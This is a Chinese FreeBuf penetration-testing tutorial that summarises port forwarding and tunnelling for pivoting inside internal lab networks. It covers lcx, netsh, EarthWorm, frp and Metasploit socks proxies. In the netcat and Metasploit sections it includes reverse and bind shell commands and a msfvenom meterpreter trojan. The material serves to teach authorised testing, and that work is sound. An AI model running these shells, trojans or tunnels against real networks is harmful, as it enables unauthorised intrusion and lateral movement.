freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

内网渗透端口转发总结
山东泽鹿安全技术有限公司 2022-05-20 12:07:52 240270
所属地 山东省

0前言

端口转发也称隧道,转发、映射、代理间的区别如下:

转发:一个网络节点转发到另一个,外网用户经过NAT到达内网ip的某端口。

映射:端口映射是将外网主机ip的端口映射到内网中。

代理:一种结果,以端口转发和映射为基础。原理是动态的端口转发,本机和代理间建个隧道,代理根据本机发送的请求动态的获取出链的地址与端口。

内网穿透:攻击机和靶机不在同一内网,这时就需使用内网穿透。

端口转发原理:

1 windows版lcx介绍

1.0环境搭建

1.2操作步骤

1.2.1受害机执行

lcx.exe -slave 192.168.112.1 5333 172.16.1.2 3389

表将内网机(172.16.1.2:3389)转发到攻击机(192.168.112.1:5333)

1.2.2攻击机执行

lcx.exe -listen 5333 5555,表将“监听到5333端口的流量”转发至5555端口上。

1.2.3攻击机IP远程连接192.168.112.1:5555

2 netsh端口映射

netsh interface portproxy add v4tov4 listenport=7777 connectaddress=192.168.112.144 connectport=3389

netsh interface portproxy show all

netsh interface portproxy reset

netsh interface portproxy show all

3 EarthWorm(很重要,重点学习)

下载地址:http://rootkiter.com/EarthWorm/,内网穿透神器EarthWorm(EW),功能强大的网络穿透工具,具有socks5代理、端口转发,端口映射三大功能。

-l

指定要监听的本地端口。

-d

指定要反弹到的机器ip。

-e

指定要反弹到机器的端口。

-f

指定要主动连接的机器ip。

-g

指定要主动连接的机器端口。

-t

指定超时时长,默认为1000。

3.1正向socks v5

流量方向:本机àwin7àwinser2012

win7上执行:ew_win32.exe -s lcx_tran -l 1080 -f 172.16.1.3 -g 3389

解释:将172.16.1.3:3389代理到win7的1080端口。

win10远程连接win7:1080即可远程连接到WinSer2012

3.2反向socks v5+proxifier

3.2.0环境搭建

3.2.1操作步骤

win10执行:ew_win32.exe -s rcsocks -l 1080 -e 8888

1-win2012执行:ew_win32.exe -s rssocks -d 192.168.112.1 -e 8888

1653018510_62870f8e0d7270e7acce9.png!small?1653018511520

proxifier配置代理服务器为127.0.0.1:1080

1653018560_62870fc08461bd4237c38.png!small?1653018562175

win10开启远程连接,172.16.1.6

1653018579_62870fd3548d21a5d958d.png!small?1653018580840

1653018604_62870fecaf9e514fdf0c5.png!small?1653018606207

3.3二级内网穿透

3.3.1 lcx_tran用法

1653018640_628710106ca3f5c0288ce.png!small?1653018641846

1653018649_628710191786de1f5e152.png!small?1653018650516

1653018658_62871022bd4575a4b753e.png!small?1653018660246

1653018681_62871039bf0b8f0c15f66.png!small?1653018683296

1653018689_628710412b40868d11805.png!small?1653018690778

1653018695_6287104763d6d348a47ca.png!small?1653018696848

1653018705_6287105155d0356bda8cf.png!small?1653018706836

3.3.2 lcx_listen lcx_slave

1653018724_6287106447d70c9f97d12.png!small?1653018725702

win10:ew_win32.exe -s lcx_listen -l 1080 -e 8888

2-win2012:ew_win32.exe -s ssocksd -l 9999

1-win2012:ew_win32.exe -s lcx_slave  -d 192.168.112.1 -e 8888 -f 172.16.1.6 -g 9999

1653018754_6287108299050b3e2e219.png!small?1653018756085

1653018776_6287109840a9e8608c92f.png!small?1653018777711

1653018786_628710a245549999e8536.png!small?1653018787769

1653018799_628710af95311c82220c0.png!small?1653018801224

1653018808_628710b88e21cba662216.png!small?1653018810152

1653018824_628710c8a059170b5f4c7.png!small?1653018826062

1653018836_628710d43ce65782870ca.png!small?1653018837769

4 netcat

1653018870_628710f68444bc378f0f9.png!small?1653018871952

4.1反向连接

1-win2012: nc64.exe -lvp 12345

1653018849_628710e127a15cda96457.png!small?1653018850553

2-win2012: nc64.exe -e cmd.exe 172.16.1.5 12345

1653018919_628711277dc0f261a8675.png!small?1653018920924

1-win2012已反弹到shell

1653018929_62871131692977f048b15.png!small?1653018930840

4.2正向连接

2-win2012: nc64.exe -lvp 12345 -e cmd.exe

1653018966_62871156701615ac8cb4a.png!small?1653018967842

1-win2012:nc64.exe 172.16.1.6 12345

1653018982_628711663472266a1183e.png!small?1653018983597

5 frp内网穿透

5.0环境搭建

1653019015_628711872bcf8e6f9ba01.png!small?1653019016569

5.1配置文件

5.1.1 frpc.ini配置文件

[common]

server_addr = 192.168.112.1

server_port = 7000

token = 123

[plugin_socks]

type = tcp

remote_port = 8899

plugin = socks5

1653019048_628711a8d2cb0a3f7ab07.png!small?1653019050293

5.1.2 frps.ini配置文件

[common]

bind_addr = 0.0.0.0

bind_port = 7000

token = 123

1653019070_628711be4ca61a1d94286.png!small?1653019071699

5.2命令执行

先运行:frps.exe -c frps.ini

1653019107_628711e3822b0d0c5be10.png!small?1653019109087

再运行:frpc.exe -c frpc.ini

1653019133_628711fd95642caace23d.png!small?1653019134996

本机配代理Proxifier

1653019145_62871209d4269eaa510bb.png!small?1653019147326

远程连接测试成功

1653019156_628712147f144f722b79e.png!small?1653019157954

1653019166_6287121e510cc64335a13.png!small?1653019167788

6 MSF socks 隧道代理

1653019182_6287122ec9cb3642487e4.png!small?1653019184228

假设已获取winserver2008的服务器权限,用msf做演示。

msf生成exe木马控winserver2008

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.190.129 LPORT=12345 -f exe > ./WinSer2008.exe

1653019218_62871252869d7b441dadb.png!small?1653019220085

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.190.129

set LPORT 12345

run

1653019230_6287125e7d4f18a99d5e3.png!small?1653019232077

route

1653019264_6287128032b424f0dacb4.png!small?1653019266022

然后添加路由:run autoroute -s 172.16.1.0

1653019277_6287128ddeec5a1833d50.png!small?1653019279452

然后查看添加的路由:run autoroute -p

1653019301_628712a5cd1cee9b3e7fd.png!small?1653019303373

background

1653019328_628712c0c8e3eab8cc5f6.png!small?1653019330223

然后搜索可以做代理的模块,并使用它:

search socks_proxy

use auxiliary/server/socks_proxy

show options

set username admin

set password 123456

1653019364_628712e47a421d4f19b9b.png!small?1653019365960

1653019375_628712ef490fb48013c5a.png!small?1653019377272

1653019380_628712f4a2b2df36ba7a6.png!small

然后run

1653019410_62871312a890fc84de419.png!small?1653019412131

windows下proxifer测试。

1653019427_628713239297600f2ee97.png!small?1653019429047

1653019440_628713304156956afbbfb.png!small?1653019441799

1653019450_6287133a1a0081a59de2e.png!small?1653019451548

vi /etc/proxychains.conf

1653019478_62871356384770324c66b.png!small?1653019479666

1653019488_62871360e4ffdfe6d4efe.png!small?1653019490395


# 渗透测试 # 内网渗透
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 山东泽鹿安全技术有限公司 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
山东泽鹿安全技术有限公司 LV.3
山东泽鹿安全技术有限公司
  • 6 文章数
  • 12 关注者
常见漏洞扫描工具介绍
2023-03-29
DouPHP代码审计-文件上传导致的XSS
2022-02-25
【数据库提权系列】---【SQL Server-xp_cmdshell提权篇】
2022-01-04
文章目录